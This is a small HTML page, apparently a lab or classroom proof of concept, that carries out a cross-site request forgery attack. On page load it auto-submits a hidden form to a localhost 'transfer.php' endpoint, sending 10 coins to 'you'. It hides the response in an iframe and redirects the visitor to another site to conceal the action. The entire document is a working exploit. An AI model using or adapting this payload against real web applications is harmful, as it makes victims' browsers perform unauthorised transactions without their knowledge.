<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3. org/TR/html4/loose.dtd">
<HTML>
<HEAD>
</HEAD>

<form id="barbarbar" target="iframe" method="POST" action="http://localhost/transfer.php">
<input type="hidden" name="coins" value="10"/>
<input type="hidden" name="recipient" value="you"/>
<input type="hidden" name="submission" value="Send"/>
<input type="submit" value=""/>
</form>
<iframe name="iframe"></iframe>
<script type="text/javascript">
    document.getElementById('barbarbar').submit();
    window.location="http://yesimparanoid.com/";
</script>

</BODY>
</HTML>
